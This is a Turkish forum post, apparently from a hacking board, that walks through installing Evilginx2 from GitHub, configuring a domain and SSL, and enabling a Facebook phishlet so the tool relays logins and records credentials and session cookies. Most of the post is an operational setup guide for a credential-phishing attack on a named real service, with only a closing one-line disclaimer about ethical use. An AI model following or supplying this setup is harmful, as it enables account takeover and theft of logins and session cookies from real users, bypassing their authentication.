- Katılım
- 30 Temmuz 2024
- Mesajlar
- 20
- Tepkime puanı
- 17
Evilginx2 Nedir?
Evilginx2, bir MITM (Man-in-the-Middle) saldırı aracıdır ve phishing (oltalama) saldırılarında kullanılan sofistike bir araçtır. Bu araç, kullanıcıların kimlik doğrulama bilgilerini ve oturum çerezlerini ele geçirmek için kullanılır.Evilginx2 Nasıl Kurulur?
- Gerekli Bağımlılıkların Yüklenmesi:
Evilginx2'yi çalıştırmak için öncelikle bazı bağımlılıkları yüklemeniz gerekiyor. Aşağıdaki komutları terminalde çalıştırarak gerekli yazılımları yükleyin:
Kod:
sudo apt-get update
sudo apt-get install git make gcc libtool libssl-dev libcurl4-openssl-dev
2. Evilginx2'yi GitHub'dan Klonlama:
Evilginx2'nin en güncel sürümünü GitHub'dan klonlayın:
Kod:
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
Evilginx2'nin Derlenmesi ve Yüklenmesi:
Aşağıdaki komutları kullanarak Evilginx2'yi derleyin ve yükleyin:
Kod:
make
sudo make install
Evilginx2'nin Yapılandırılması
- DNS Ayarlarının Yapılandırılması:
Evilginx2'yi kullanmadan önce, bir alan adı kaydetmeniz ve bu alan adını sunucunuzun IP adresine yönlendirmeniz gerekmektedir. DNS yapılandırması genellikle alan adınızı yönettiğiniz kontrol paneli üzerinden yapılır. - Evilginx2'yi Çalıştırma:
Evilginx2'yi çalıştırmak için şu komutu kullanın:
Kod:
sudo evilginx2
- Bu komut, aracı başlatır ve komut satırında Evilginx2 kabuğuna geçersiniz.
3. Evilginx2 Ayarlarının Yapılması:
Alan adınızı ve gerekli diğer ayarları yapılandırmak için aşağıdaki komutu kullanın:
-
Kod:
config domain senin-alan-adin.com
-
Kod:
ssl install senin-alan-adin.com
Phishing Sayfalarının Oluşturulması
- Phishletlerin Yüklenmesi:
Evilginx2, phishing sayfalarını oluşturmak için "phishlet" adı verilen yapılandırma dosyalarını kullanır. Bir phishleti yüklemek için şu komutu kullanabilirsiniz:
- Phishletlerin Yüklenmesi:
Kod:
phishlets hostname facebook senin-alan-adin.com
phishlets enable facebook
- Kurulumun Test Edilmesi:
Kurulumu test etmek için kendi alan adınızı ziyaret ederek phishing sayfasının doğru bir şekilde çalışıp çalışmadığını kontrol edin.
Evilginx2 Nasıl Çalışır?
Evilginx2, kullanıcının giriş yaptığı siteye benzeyen bir phishing sayfası oluşturur. Kullanıcı, bu sayfaya giriş yaptığında, Evilginx2 kullanıcıdan gelen bilgileri toplar ve gerçek siteye iletir. Bu işlem sırasında, Evilginx2 kullanıcı oturumunu ve kimlik doğrulama bilgilerini kaydeder.Önemli: Bu araç yalnızca etik hacking ve güvenlik testleri amacıyla kullanılmalıdır. Kötü amaçlı kullanım, yasa dışıdır ve ciddi yasal sonuçlara yol açabilir.